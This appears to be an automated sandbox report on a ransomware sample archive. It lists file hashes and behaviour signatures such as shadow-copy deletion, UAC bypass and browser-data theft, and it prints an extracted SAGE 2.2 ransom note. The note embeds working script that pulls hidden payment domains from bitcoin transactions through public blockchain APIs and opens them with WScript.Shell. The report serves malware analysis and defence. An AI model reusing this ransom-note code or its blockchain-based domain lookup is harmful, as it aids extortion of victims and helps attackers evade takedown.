General

  • Target

    RNSM00304.7z

  • Size

    5.2MB

  • Sample

    241113-xpbg8axglj

  • MD5

    dc62e82e549b00b0004246ba528613ac

  • SHA1

    94cf011081309a7d1782ff479ebf8c2565a97ee9

  • SHA256

    e52a24621f9333c1353f83717f7a9429d80a10bfab87f624026f60117a3b3f85

  • SHA512

    442ffaead1ecf113c1cd085ff1fe07ef74e8c4fe65bad2ff0ef9af238134c269cdd5a1d84ce3f5312754ad9a9431c80fa739da75f33f399b34df3d9df0a00c8c

  • SSDEEP

    98304:jvM2F9KNeIIQVUyjK8xBS0E77jo5yl+smF4zEepq:LZ9KYjQ/Vx00rol1mG3pq

Malware Config

Extracted

Path

C:\Users\Public\Libraries\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AQAAAAAAAAAAI0zIcRD0R0Gf7EPawGrzLcS7OZwi1kx27dH9WUTKHA7A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Targets

    • Target

      RNSM00304.7z

    • Size

      5.2MB

    • MD5

      dc62e82e549b00b0004246ba528613ac

    • SHA1

      94cf011081309a7d1782ff479ebf8c2565a97ee9

    • SHA256

      e52a24621f9333c1353f83717f7a9429d80a10bfab87f624026f60117a3b3f85

    • SHA512

      442ffaead1ecf113c1cd085ff1fe07ef74e8c4fe65bad2ff0ef9af238134c269cdd5a1d84ce3f5312754ad9a9431c80fa739da75f33f399b34df3d9df0a00c8c

    • SSDEEP

      98304:jvM2F9KNeIIQVUyjK8xBS0E77jo5yl+smF4zEepq:LZ9KYjQ/Vx00rol1mG3pq

    • Dharma

      Dharma is a ransomware that uses security software installation to hide malicious activities.

    • Dharma family

    • GlobeImposter

      GlobeImposter is a ransomware first seen in 2017.

    • Globeimposter family

    • Gozi

      Gozi is a well-known and widely distributed banking trojan.

    • Gozi family

    • UAC bypass

    • Contacts a large (7704) amount of remote hosts

      This may indicate a network scan to discover remotely running services.

    • Creates a large amount of network flows

      This may indicate a network scan to discover remotely running services.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (1017) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Clears Network RDP Connection History and Configurations

      Remove evidence of malicious network connections to clean up operations traces.

    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Unexpected DNS network traffic destination

      Network traffic to other servers than the configured DNS servers was detected on the DNS port.

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Drops desktop.ini file(s)

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Indicator Removal: File Deletion

      Adversaries may delete files left behind by the actions of their intrusion activity.

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

MITRE ATT&CK Enterprise v15

Tasks